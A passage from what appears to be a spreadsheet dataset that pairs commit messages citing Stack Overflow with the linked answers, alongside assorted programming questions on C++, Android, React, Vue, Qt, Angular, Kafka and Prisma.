    cout &amp;lt;&amp;lt; &amp;quot;Method 1 Time: &amp;quot; &amp;lt;&amp;lt; time1 &amp;lt;&amp;lt; &amp;quot; sec\n\n&amp;quot;;
    auto start2 = high_resolution_clock::now();
    method2(comparisons2);
    auto end2 = high_resolution_clock::now();
    double time2 = duration&amp;lt;double&amp;gt;(end2 - start2).count();
    cout &amp;lt;&amp;lt; &amp;quot;Method 2 Time: &amp;quot; &amp;lt;&amp;lt; time2 &amp;lt;&amp;lt; &amp;quot; sec\n&amp;quot;;
    double speedup = time2 / time1;
    double comparison_reduction = (double)comparisons2 / comparisons1;
    cout &amp;lt;&amp;lt; &amp;quot;\nMethod 1 is **&amp;quot; &amp;lt;&amp;lt; speedup &amp;lt;&amp;lt; &amp;quot;Ã—** faster than Method 2.\n&amp;quot;;
    cout &amp;lt;&amp;lt; &amp;quot;Method 1 does **&amp;quot; &amp;lt;&amp;lt; comparison_reduction &amp;lt;&amp;lt; &amp;quot;Ã—** fewer comparisons.\n&amp;quot;;
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Does this type of loop optimization (&lt;code&gt;y += 6&lt;/code&gt;) generally lead to performance improvements, or does it depend on specific compiler optimizations?&lt;/li&gt;
&lt;li&gt;Are there better ways to approach this kind of problem in C++?&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Benchmark Results&lt;/strong&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Smaller Range (50 â†’ 300, 70 â†’ 400)&lt;/strong&gt;&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;
Method 1 count: 8040
Method 1 comparisons: 8796
Method 1 Time: 3.114e-05 sec
Method 2 count: 8040
Method 2 comparisons: 56285
Method 2 Time: 1.6753e-05 sec
Method 1 is **0.53799Ã—** faster than Method 2.
Method 1 does **6.39893Ã—** fewer comparisons.
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;&lt;strong&gt;Larger Range (5000 â†’ 30000, 7000 â†’ 40000)&lt;/strong&gt;&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;
Method 1 count: 80074785
Method 1 comparisons: 80149790
Method 1 Time: 0.0372139 sec
Method 2 count: 80074785
Method 2 comparisons: 560523500
Method 2 Time: 0.127715 sec
Method 1 is **3.43193Ã—** faster than Method 2.
Method 1 does **6.99345Ã—** fewer comparisons.
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;Analysis&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;For a small range&lt;/strong&gt;, Method 1 does ~6.4Ã— fewer comparisons but isn't significantly faster. &lt;code&gt;(Why?)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;For a larger range&lt;/strong&gt;, Method 1 does ~7Ã— fewer comparisons and is &lt;strong&gt;~3.4Ã— faster&lt;/strong&gt;, proving its efficiency at scale.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimization Impact:&lt;/strong&gt; Skipping unnecessary checks (&lt;code&gt;y += 6&lt;/code&gt;) improves performance &lt;strong&gt;as input size grows&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C138</t>
  </si>
  <si>
    <t>Fixing crash when starting component activity
Issue #6. Via https://stackoverflow.com/a/50833599</t>
  </si>
  <si>
    <t>Android Doc says -FLAG_ACTIVITY_NEW_TASK requirement is now enforced
With Android 9, you cannot start an activity from a non-activity context unless you pass the intent flag FLAG_ACTIVITY_NEW_TASK. If you attempt to start an activity without passing this flag, the activity does not start, and the system prints a message to the log.
Note: The flag requirement has always been the intended behavior, and was enforced on versions lower than Android 7.0 (API level 24). A bug in Android 7.0 prevented the flag requirement from being enforced.
That means for (Build.VERSION.SDK_INT &lt;= Build.VERSION_CODES.M) || (Build.VERSION.SDK_INT &gt;= Build.VERSION_CODES.P) it is mandatory to add Intent.FLAG_ACTIVITY_NEW_TASK while calling startActivity() from outside of an Activity context.
So it is better to add flag for all the versions -
...
Intent i = new Intent(this, Wakeup.class);
i.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
...</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer would like to know who is online and currently using the custom application we wrote for them.  I discussed it with them and this does not need to be exact, more of a guestimate will work.  
So my thought is a 15 minute time interval to determine user activity.  Some ideas I have for doing this are as follows:
Stamp their user record with a date and time of their last activity every time they do something that hits the database, or requests a web page ... this though could be quite database intensive.
Send out a "who is online request" from our software, looking for responses, this could be done at a scheduled interval, and then stamp the user record with the current date and time for each response I received.
What are your thoughts?  And how would you handle this situation?
Clarification
I would like to use the same architecture for both Windows or the Web if possible.  I have a single business logic layer that multiple user interfaces interact with, could be Windows or the Web.
By Windows I would mean client-server.
Clarification
I am using an n-tier architecture so my business objects handle all the interaction with the presentation layer.  That presentation layer could be feeding a client-server Windows application, Web application, Web Service and so on.  
It is not a high traffic application, as it was developed for a customer of ours, maybe 100 users at most.
</t>
  </si>
  <si>
    <t>C139</t>
  </si>
  <si>
    <t>Fix bug with controlled component
https://stackoverflow.com/a/47012342/161457</t>
  </si>
  <si>
    <t>The reason is, in state you defined:
this.state = { fields: {} }
fields as a blank object, so during the first rendering
this.state.fields.name
will be
undefined
, and the input field will get its value as:
value={undefined}
Because of that, the input field will become uncontrolled.
Once you enter any value in input,
fields
in state gets changed to:
this.state = { fields: {name: 'xyz'} }
And at that time the input field gets converted into a controlled component; that's why you are getting the error:
A component is changing an uncontrolled input of type text to be
  controlled.
Possible Solutions:
1- Define the
fields
in state as:
this.state = { fields: {name: ''} }
2- Or define the value property by using
Short-circuit evaluation
like this:
value={this.state.fields.name || ''}   // (undefined || '') = ''</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am making mods for a game made with Unity. They are compiled using &lt;code&gt;netstandard2.1&lt;/code&gt;, Class Library project type. The game then dynamically loads those mods' DLL files. I code it using Visual Studio only and no Unity involved or even installed.&lt;/p&gt;
&lt;p&gt;However, when using VS' &lt;strong&gt;Attach to Process&lt;/strong&gt; feature, the breakpoints don't hit. I have checked:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have debug symbol (PDB) embedded because the game does not load PDB files:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;DebugSymbols&amp;gt;true&amp;lt;/DebugSymbols&amp;gt;
&amp;lt;DebugType&amp;gt;embedded&amp;lt;/DebugType&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;I know the debug symbols are there by confirming with &lt;code&gt;UnityEngine.Debug.Log(new StackTrace(true))&lt;/code&gt; and the line numbers are there. If there is no debug symbol, line numbers would not be there.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I tested with a Console app and I know I can attach to a process with &lt;code&gt;embedded&lt;/code&gt; PDB so I know it's possible.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The only difference I can see is: when attaching to my test &lt;code&gt;ConsoleApp&lt;/code&gt;, the &lt;strong&gt;Code type&lt;/strong&gt; would be &lt;strong&gt;Automatic: Managed&lt;/strong&gt;, but when attaching to the game's process, it says &lt;strong&gt;Automatic: Native&lt;/strong&gt;. So I assume &lt;em&gt;maybe&lt;/em&gt; Unity or Mono did something to the game so my DLL is no longer recognizable by VS. I did manually change it to Managed as well but it didn't hit still.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/UpS7xQED.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/UpS7xQED.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;What could be the issue here? How do I debug my mods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C14</t>
  </si>
  <si>
    <t>Added test for new cog_state design for FSM
The new design follows a stackoverflow one, where I have taken some of
the concepts and fitted them to cog's code standards [http://stackoverflow.com/a/1647679/639602].
The design allows for multiple state machines to be created and for the
user to add their own states on the fly.</t>
  </si>
  <si>
    <t>State machines that I've designed before (C, not C++) have all come down to a struct array and a loop. The structure basically consists of a state and event (for look-up) and a function that returns the new state, something like:
typedef struct {
    int st;
    int ev;
    int (*fn)(void);
} tTransition;
Then you define your states and events with simple defines (the
ANY
ones are special markers, see below):
#define ST_ANY              -1
#define ST_INIT              0
#define ST_ERROR             1
#define ST_TERM              2
: :
#define EV_ANY              -1
#define EV_KEYPRESS       5000
#define EV_MOUSEMOVE      5001
Then you define all the functions that are called by the transitions:
static int GotKey (void) { ... };
static int FsmError (void) { ... };
All these function are written to take no variables and return the new state for the state machine. In this example global variables are used for passing any information into the state functions where necessary.
Using globals isn't as bad as it sounds since the FSM is usually locked up inside a single compilation unit and all variables are static to that unit (which is why I used quotes around "global" above - they're more shared within the FSM, than truly global). As with all globals, it requires care.
The transitions array then defines all possible transitions and the functions that get called for those transitions (including the catch-all last one):
tTransition trans[] = {
    { ST_INIT, EV_KEYPRESS, &amp;GotKey},
    : :
    { ST_ANY, EV_ANY, &amp;FsmError}
};
#define TRANS_COUNT (sizeof(trans)/sizeof(*trans))
What that means is: if you're in the
ST_INIT
state and you receive the
EV_KEYPRESS
event, make a call to
GotKey
.
The workings of the FSM then become a relatively simple loop:
state = ST_INIT;
while (state != ST_TERM) {
    event = GetNextEvent();
    for (i = 0; i &lt; TRANS_COUNT; i++) {
        if ((state == trans[i].st) || (ST_ANY == trans[i].st)) {
            if ((event == trans[i].ev) || (EV_ANY == trans[i].ev)) {
                state = (trans[i].fn)();
                break;
            }
        }
    }
}
As alluded to above, note the use of
ST_ANY
as wild-cards, allowing an event to call a function no matter the current state.
EV_ANY
also works similarly, allowing any event at a specific state to call a function.
It can also guarantee that, if you reach the end of the transitions array, you get an error stating your FSM hasn't been built correctly (by using the
ST_ANY/EV_ANY
combination.
I've used code similar for this on a great many communications projects, such as an early implementation of communications stacks and protocols for embedded systems. The big advantage was its simplicity and relative ease in changing the transitions array.
I've no doubt there will be higher-level abstractions which may be more suitable nowadays but I suspect they'll all boil down to this same sort of structure.
And, as
ldog
states in a comment, you can avoid the globals altogether by passing a structure pointer to all functions (and using that in the event loop). This will allow multiple state machines to run side-by-side without interference.
Just create a structure type which holds the machine-specific data (state at a bare minimum) and use that instead of the globals.
The reason I've rarely done that is simply because most of the state machines I've written have been singleton types (one-off, at-process-start, configuration file reading for example), not needing to run more than one instance. But it has value if you need to run more than one.</t>
  </si>
  <si>
    <t xml:space="preserve">Have you used VS.NET Architect Edition's Application and System diagrams to start designing a solution?
If so, did you find it useful?
Did the "automatic implementation" feature work ok?
</t>
  </si>
  <si>
    <t>C140</t>
  </si>
  <si>
    <t>UI: Fix performance issues with the Log Viewer
This commit includes two big changes, alongside other smaller tweaks.
1) Update the internal QTextDocument of the text component directly
2) Use QPlainTextEdit, which supports HTML &amp; is designed for long text
3) Use QString's arg function for formatting strings
Fix 1 significantly improves realtime performance when adding lines
individually, to the point that the UI no longer freezes if the viewer
is open and the log is being spammed. It also improves initial launch
speed when there's a large amount of text already in the file.
Reference: https://stackoverflow.com/a/54501760/2763321
Fix 2 completely eliminates delay when opening the viewer, regardless
of how many lines are already in the log file. For a standard log
after OBS launch, this cuts opening time from about 2 seconds to half a
second. For anything longer than 1,000 lines, the UI no longer freezes,
and the viewer (&amp; its contents) open within half a second.
Reference: https://stackoverflow.com/a/17466240/2763322</t>
  </si>
  <si>
    <t>From QPlainTextEdit's documentation:
Introduction and Concepts:
QPlainTextEdit is an advanced viewer/editor supporting plain text. It is optimized to handle large documents and to respond quickly to user input.
QPlainText uses very much the same technology and concepts as QTextEdit, but is optimized for plain text handling.
QPlainTextEdit works on paragraphs and characters. A paragraph is a formatted string which is word-wrapped to fit into the width of the widget. By default when reading plain text, one newline signifies a paragraph. A document consists of zero or more paragraphs. Paragraphs are separated by hard line breaks. Each character within a paragraph has its own attributes, for example, font and color.
Differences to QTextEdit:
QPlainTextEdit is a thin class, implemented by using most of the technology that is behind QTextEdit and QTextDocument. Its performance benefits over QTextEdit stem mostly from using a different and simplified text layout called QPlainTextDocumentLayout on the text document (see QTextDocument::setDocumentLayout()). The plain text document layout does not support tables nor embedded frames, and replaces a pixel-exact height calculation with a line-by-line respectively paragraph-by-paragraph scrolling approach. This makes it possible to handle significantly larger documents, and still resize the editor with line wrap enabled in real time. It also makes for a fast log viewer (see setMaximumBlockCount()).
So the difference is that QPlainTextEdit is optimized for handling plain text, and can be used even with very large plain text files. Also the way text is formatted is simpler.
If you plan to support only plain texts, then QPlainTextEdit is the right choice.</t>
  </si>
  <si>
    <t>UI: Fix performance issues with the Log Viewer
This commit includes two big changes, alongside other smaller tweaks.
1) Update the internal QTextDocument of the text component directly
2) Use QPlainTextEdit, which supports HTML &amp; is designed for long text
3) Use QString's arg function for formatting strings
Fix 1 significantly improves realtime performance when adding lines
individually, to the point that the UI no longer freezes if the viewer
is open and the log is being spammed. It also improves initial launch
speed when there's a large amount of text already in the file.
Reference: https://stackoverflow.com/a/54501760/2763321
Fix 2 completely eliminates delay when opening the viewer, regardless
of how many lines are already in the log file. For a standard log
after OBS launch, this cuts opening time from about 2 seconds to half a
second. For anything longer than 1,000 lines, the UI no longer freezes,
and the viewer (&amp; its contents) open within half a second.
Reference: https://stackoverflow.com/a/17466240/2763321</t>
  </si>
  <si>
    <t>If you want each append to actually show quickly &amp; separately (instead of waiting until they've all been appended before they are shown), you need to access the internal QTextDocument:
void fastAppend(QString message,QTextEdit *editWidget)
{
    const bool atBottom = editWidget-&gt;verticalScrollBar()-&gt;value() == editWidget-&gt;verticalScrollBar()-&gt;maximum();
    QTextDocument* doc = editWidget-&gt;document();
    QTextCursor cursor(doc);
    cursor.movePosition(QTextCursor::End);
    cursor.beginEditBlock();
    cursor.insertBlock();
    cursor.insertHtml(message);
    cursor.endEditBlock();
    //scroll scrollarea to bottom if it was at bottom when we started
    //(we don't want to force scrolling to bottom if user is looking at a
    //higher position)
    if (atBottom) {
        scrollLogToBottom(editWidget);
    }
}
void scrollLogToBottom(QTextEdit *editWidget)
{
    QScrollBar* bar =  editWidget-&gt;verticalScrollBar();
    bar-&gt;setValue(bar-&gt;maximum());
}
The scrolling to bottom is optional, but in logging use it's a reasonable default for UI behaviour.
Also, if your app is doing lots of other processing at the same time, appending this at the end of fastAppend, will prioritize actually getting the message displayed asap:
    //show the message in output right away by triggering event loop
    QCoreApplication::processEvents();
This actually seems a kind of trap in Qt. I would know why there isn't a fastAppend method directly in QTextEdit? Or are there caveats to this solution?
(My company actually paid KDAB for this advice, but this seems so silly that I thought this should be more common knowledge.)</t>
  </si>
  <si>
    <t xml:space="preserve">I'm reading the book "The Software Architect's Profession" by Marc and Laura Sewell ([external-link]) and it got me wondering whether a software architect is a part of the old non-agile BDUF approach.
Is there a place for software architects in an agile approach? I'm especially interested in Scrum.
BTW I currently am the Unix Application Architect for a major company.
cheers,
Rob
</t>
  </si>
  <si>
    <t>C141</t>
  </si>
  <si>
    <t>Fix broken Cmd-K shortcut to focus search bar (#45)
Learnt a new [vuejs pattern][0] to call methods on child components from parent component.
[0]: https://stackoverflow.com/questions/42632711/how-to-call-function-on-child-component-on-parent-events</t>
  </si>
  <si>
    <t>Vue 3 Composition API
Create a ref for the child component, assign it in the template, and use the &lt;ref&gt;.value to call the child component directly.
&lt;script setup&gt;
import {ref} from 'vue';
const childComponentRef = ref(null);
function click() {
  // `childComponentRef.value` accesses the component instance
  childComponentRef.value.doSomething(2.0);
}
&lt;/script&gt;
&lt;template&gt;
  &lt;div&gt;
    &lt;child-component ref="childComponentRef" /&gt;
    &lt;button @click="click"&gt;Click me&lt;/button&gt;
  &lt;/div&gt;
&lt;/template&gt;
Couple things to note-
If your child component is using &lt;script setup&gt;, you'll need to declare public methods (e.g. doSomething above) using defineExpose.
If you're using Typescript, details of how to type annotate this are here.
Vue 3 Options API / Vue 2
Give the child component a ref and use $refs to call a method on the child component directly.
html:
&lt;div id="app"&gt;
  &lt;child-component ref="childComponent"&gt;&lt;/child-component&gt;
  &lt;button @click="click"&gt;Click&lt;/button&gt;  
&lt;/div&gt;
javascript:
var ChildComponent = {
  template: '&lt;div&gt;{{value}}&lt;/div&gt;',
  data: function () {
    return {
      value: 0
    };
  },
  methods: {
    setValue: function(value) {
        this.value = value;
    }
  }
}
new Vue({
  el: '#app',
  components: {
    'child-component': ChildComponent
  },
  methods: {
    click: function() {
        this.$refs.childComponent.setValue(2.0);
    }
  }
})
For more info, see Vue 3 docs on component refs or Vue 2 documentation on refs.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an Android project where I need to count the number of clicks or screen touches that occur on an underlying application, even when my app is running in the foreground.&lt;/p&gt;
&lt;p&gt;Here's the scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;My app is running in the foreground.&lt;/li&gt;
&lt;li&gt;Another app (e.g., the calculator app) is running in the background, visible beneath my app.&lt;/li&gt;
&lt;li&gt;I need to detect and count the number of times the user touches the screen, even if those touches are technically interacting with the underlying app.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I've tried several approaches, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Foreground Services:&lt;/strong&gt; These allow my app to run in the foreground, but they don't seem to provide a way to capture touch events on other apps.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Accessibility Services:&lt;/strong&gt; While powerful, I'm not sure if they are the right tool for this specific task, as I don't need to interact with the underlying app's UI elements, just count the touches.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WindowManager and Overlays:&lt;/strong&gt; I've created a transparent overlay using &lt;code&gt;WindowManager&lt;/code&gt; and &lt;code&gt;SYSTEM_ALERT_WINDOW&lt;/code&gt; permission, but I'm struggling to capture touch events that are intended for the underlying app.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TouchInterceptor&lt;/strong&gt; : I created a TouchInterceptor class that extends View. I added this class to the windowManager with 0 width and 0 height. I tried to catch touch events with onTouchEvent method. But onTouchEvent method is not called.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm looking for a way to achieve this without requiring root access or modifying the underlying app.&lt;/p&gt;
&lt;p&gt;Here are my specific questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is it possible to capture touch events that occur on an underlying app from a foreground app in Android?&lt;/li&gt;
&lt;li&gt;If so, what are the recommended approaches or techniques to achieve this?&lt;/li&gt;
&lt;li&gt;Are there any specific Android APIs or permissions that I should be using?&lt;/li&gt;
&lt;li&gt;Is there a way to detect touch events without interfering with the underlying app's functionality?&lt;/li&gt;
&lt;li&gt;Why is onTouchEvent method not called?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any guidance or code examples would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C142</t>
  </si>
  <si>
    <t xml:space="preserve"> bug Unrecognized props on components
- Components that extend react-bootstrap were passing non-standard props into the component
- Resolution was to create a separate prop object deleting the non-standard props
See: https://stackoverflow.com/questions/54468535/how-to-solve-warning-react-does-not-recognize-the-x-prop-on-a-dom-element
Closes #264</t>
  </si>
  <si>
    <t>Presumably, this line must be the culprit:
&lt;FirebaseAuthProvider {...config} firebase={firebase}&gt;
Your config object currently holds fields isSignedIn and providerId, and you must be sending those down to children components, and ultimately to a DOM element. Try removing those fields from the object before you send them down:
const { providerId, isSignedIn, ...authProviderConfig } = config
That way, your object authProviderConfig will not hold the providerId or isSignedIn attributes.
Even better, you can rebuild the configuration object explicitly to avoid any further confusion:
const authProviderConfig = { /* The fields from config FirebaseAuthProvider actually needs */ }
You should also check your FirebaseAuthProvider component to see how it's using those props, and avoid spreading them down to DOM elements.
Related documentation: https://reactjs.org/warnings/unknown-prop.html</t>
  </si>
  <si>
    <t xml:space="preserve">We've got some code that uses LoadLibrary and GetProcAddress to implement a plugin architecture for one of our products. We ensure that the DLL about to be loaded is signed with our code-signing key.
We're changing the plugin architecture to use COM instead. Is there a way to enforce code-signing (preferably with our certificate) when instantiating a COM object?
</t>
  </si>
  <si>
    <t>C143</t>
  </si>
  <si>
    <t>refactor: vee-validate component way
https://stackoverflow.com/questions/66656452</t>
  </si>
  <si>
    <t>This can be solved by listening on the input/change events and passing data between
&lt;Field&gt;
and (in this special case Primevue's)
&lt;Dropdown&gt;
as follows:
&lt;Form v-slot="{ errors }" @submit="saveAndProceed()"&gt;
...
  &lt;Field
    v-slot="{ field }"
    v-model="campaign"
    name="campaign"
    value="value"
    :rules="isRequired"
  &gt;
    &lt;Dropdown
      :options="campaigns"
      option-value="id"
      option-label="name"
      placeholder="Choose a campaign"
      :model-value="field.value"
      :class="{ 'p-invalid': errors.campaign }"
      @input="field.onInput.forEach((fn) =&gt; fn($event.value))"
      @change="field.onChange.forEach((fn) =&gt; fn($event.value))"
    /&gt;
    &lt;ErrorMessage
      name="campaign"
      class="error"
    /&gt;
  &lt;/Field&gt;
...
&lt;/Form&gt;
Compare also with the following references for other events (onBlur etc.):
Vee-validate's Field reference
E.g.,
Primevue's Dropdown events</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Azure Function app and have a kafka trigger which works on other environments.  I get this error when trying to to use a new cluster locally in a docker container.  The cluster id is &lt;code&gt;FaMgNL3ASkmp-GvfewNOxw&lt;/code&gt;.  Where or how is it caching that older cluster id?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[2025-02-19T17:43:07.579Z] Libkafka: [thrd:main]: Broker GroupCoordinator/1 reports different ClusterId &amp;quot;bfU02MJ8Sz24p3v5pUAukQ&amp;quot; than previously known &amp;quot;JbosiV5OSVqk1UuvSu8IlA&amp;quot;: a client must not be simultaneously connected to multiple clusters
[2025-02-19T17:43:07.591Z] Libkafka: [thrd:main]: Broker localhost:9092/bootstrap reports different ClusterId &amp;quot;JbosiV5OSVqk1UuvSu8IlA&amp;quot; than previously known &amp;quot;bfU02MJ8Sz24p3v5pUAukQ&amp;quot;: a client must not be simultaneously connected to multiple clusters
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C144</t>
  </si>
  <si>
    <t>feat: Authentication route with PrivateRoute components
https://stackoverflow.com/questions/43164554/how-to-implement-authenticated-routes-in-react-router-4</t>
  </si>
  <si>
    <t>You're going to want to use the Redirect component. There's a few different approaches to this problem. Here's one I like, have a PrivateRoute component that takes in an authed prop and then renders based on that props.
function PrivateRoute ({component: Component, authed, ...rest}) {
  return (
    &lt;Route
      {...rest}
      render={(props) =&gt; authed === true
        ? &lt;Component {...props} /&gt;
        : &lt;Redirect to={{pathname: '/login', state: {from: props.location}}} /&gt;}
    /&gt;
  )
}
Now your Routes can look something like this
&lt;Route path='/' exact component={Home} /&gt;
&lt;Route path='/login' component={Login} /&gt;
&lt;Route path='/register' component={Register} /&gt;
&lt;PrivateRoute authed={this.state.authed} path='/dashboard' component={Dashboard} /&gt;
If you're still confused, I wrote this post that may help -  Protected routes and authentication with React Router v4</t>
  </si>
  <si>
    <t xml:space="preserve">Note that I am not asking which to choose (MVC or MVP), but rather if one of the two should be used for a web application.
I realize that it might be too much work to convert an older application from its current design to a MVC or MVP pattern. However, what about for a new app? It appears these are the most popular architecture patterns, so should one of these be chosen? If not, what other patterns are there?
If you are not familiar with MVC and/or MVP, a good question to check out is [external-link]. It has many good answers, including links to various websites that break down each one.
</t>
  </si>
  <si>
    <t>C145</t>
  </si>
  <si>
    <t>moved main extension logic to App component to maintain create-react-
app convention
see: https://stackoverflow.com/a/50493780</t>
  </si>
  <si>
    <t>index.js is the traditional and actual entry point for all node apps. Here in React it just has code of what to render and where to render.
App.js on the other hand has the root component of the react app because every view and component are handled with hierarchy in React, where &lt;App /&gt; is the top most component in the hierarchy. This gives you the feel that you maintain hierarchy in your code starting from App.js.
Other than that, you can have the App logic in the index.js file itself. But it's something related to conventions followed by the community using the library or framework. It always feels good to go along the community.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm facing the following issue when running &lt;code&gt;npx prisma generate&lt;/code&gt; in my project located at &lt;code&gt;c:\Users\ENGINEER-PC\Desktop\postgresql_project:&lt;/code&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt; Running prisma generate:
- c:\Users\ENGINEER-PC\Desktop\postgresql_project
- npx prisma generate
Command failed: npx prisma generate
Error: Could not load schema from `prisma\schema` provided by &amp;quot;prisma.schema&amp;quot; config of `package.json`: &amp;quot;prismaSchemaFolder&amp;quot; preview feature must be enabled
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've already added the necessary configuration in my &lt;code&gt;package.json&lt;/code&gt;, but the error persists. It seems the preview feature isn't enabled properly in my Prisma schema.&lt;/p&gt;
&lt;p&gt;Has anyone encountered this issue before? How can I fix it?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/UDojTxiE.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/UDojTxiE.png" alt="How i make configuration" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C146</t>
  </si>
  <si>
    <t>fix bug where navbar was disappearing when resizing the page
Replaced navbar element as previous one had too nav elements encapsulated within each other, which was causing the navbar links to disappear when page was resized to mimic a smaller screen. Furthermore, it looks like from what I can see here - https://getbootstrap.com/docs/4.0/components/navbar/ - and here - https://stackoverflow.com/questions/48320543/bootstrap-4-navbar-disappears-when-resizing-screen - the use of container-fluid class in the navbar would cause it to strech across the entire screen, which might also make it disappear or display in a strange manner. The navbar now in place switches from displaying the links horizontally to a hamburger menu on screen resize, inside which the links can be accessed.</t>
  </si>
  <si>
    <t>Of course it will disappear. The navbar-expand-lg class tells it to disappear on screens that are smaller than lg. And you don't have the navbar toggler anywhere. It's all expected behavior.
Take a look at the structure of a working navbar here:
https://getbootstrap.com/docs/4.0/components/navbar/
The navbar-toggler thingy is what appears when the navbar-expand-* class lets things disappear.
And the collapse navbar-collapse classes tell the toggler where those disappeared things are hiding. (I'm using a bit a loose terminology here)
Be careful with the container-fluid class though. Because that sucker is gonna stretch your navbar across the entire screen and people with 4K wide sceens are gonna hate you for that. Use container instead.</t>
  </si>
  <si>
    <t xml:space="preserve">At the moment, our application uses the Trident Win32 component, but we want to move away from that for a few reasons, chief among them being our desire to go cross-platform.
We're looking at [external-link] and [external-link], but I'd love to get some feedback before I make a decision. Here are some of the most important requirements:
It should be relatively fast, with a small footprint. Ideally, we would be able to trim away anything we don't need without too much effort.
Decent documentation is important. I don't anticipate needing to do anything too unusual with it, but you never know.
We're using C++, and would like to work with a well-designed object-oriented architecture, if possible.
Cross-platform is a must, and good performance would be helpful in the long run (we may end up porting to mobile platforms).
Are there any considerations I need to take into account before making a decision? Has anyone worked with WebKit or Gecko before? If so, are there any articles or tutorials I might find useful?
Update:
Thanks for the responses guys. We ended up going with Qt 4.5, which includes WebKit. We're really pleased with it so far, in fact I think Qt is probably the best UI framework I've ever used; the difference between coding with the native Win32 APIs and this is staggering. It's also real easy to learn, the only major issue we had was getting used to the signals/slots paradigm.
</t>
  </si>
  <si>
    <t>C147</t>
  </si>
  <si>
    <t>fix max component budget issue
https://stackoverflow.com/questions/53995948/warning-in-budgets-maximum-exceeded-for-initial/53995996</t>
  </si>
  <si>
    <t>Open angular.json file and find budgets keyword.
It should look like:
    "budgets": [
       {
          "type": "initial",
          "maximumWarning": "2mb",
          "maximumError": "5mb"
       }
    ]
As you’ve probably guessed you can increase the maximumWarning value to prevent this warning, i.e.:
    "budgets": [
       {
          "type": "initial",
          "maximumWarning": "4mb", &lt;===
          "maximumError": "5mb"
       }
    ]
What does budgets mean?
A performance budget is a group of limits to certain values that affect site performance, that may not be exceeded in the design and development of any web project.
In our case budget is the limit for bundle sizes.
See also:
https://github.com/webpack/webpack/issues/3216
https://angular.io/guide/build#configure-size-budgets
Performance Budgets (Keep Request Counts Low And File Sizes Small)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm facing an odd behavior on one of my applications. So I have an application that has an &lt;code&gt;POST&lt;/code&gt; entrypoint that receives a list of order id's and after processing each order it must inform an external API about the monetary value of each order. So what we did was the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;order_details_tasks = [
        asyncio.create_task(
            self.launch_individual_order_details(order),
            name=f&amp;quot;task_order_{order.id}&amp;quot;,
        )
        for order in active_orders
    ]
    results = await asyncio.gather(*order_details_tasks, return_exceptions=True)
    for task, result in zip(order_details_tasks, results):
        if isinstance(result, Exception):
            print(f&amp;quot;âš ï¸ Task '{task.get_name()}' raised an exception: {result}&amp;quot;)
        else:
            print(f&amp;quot;âœ… Task '{task.get_name()}' succeeded with result: {result}&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;launch_individual_order_details(order)&lt;/code&gt; function does the following stuff and other non &lt;code&gt;I/O&lt;/code&gt; logic before this block:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;logger.debug(f&amp;quot;Sending order details with success for order: {order.id}&amp;quot;)    
await order_service.send_order_request(order)
&lt;/code&gt;&lt;/pre&gt;
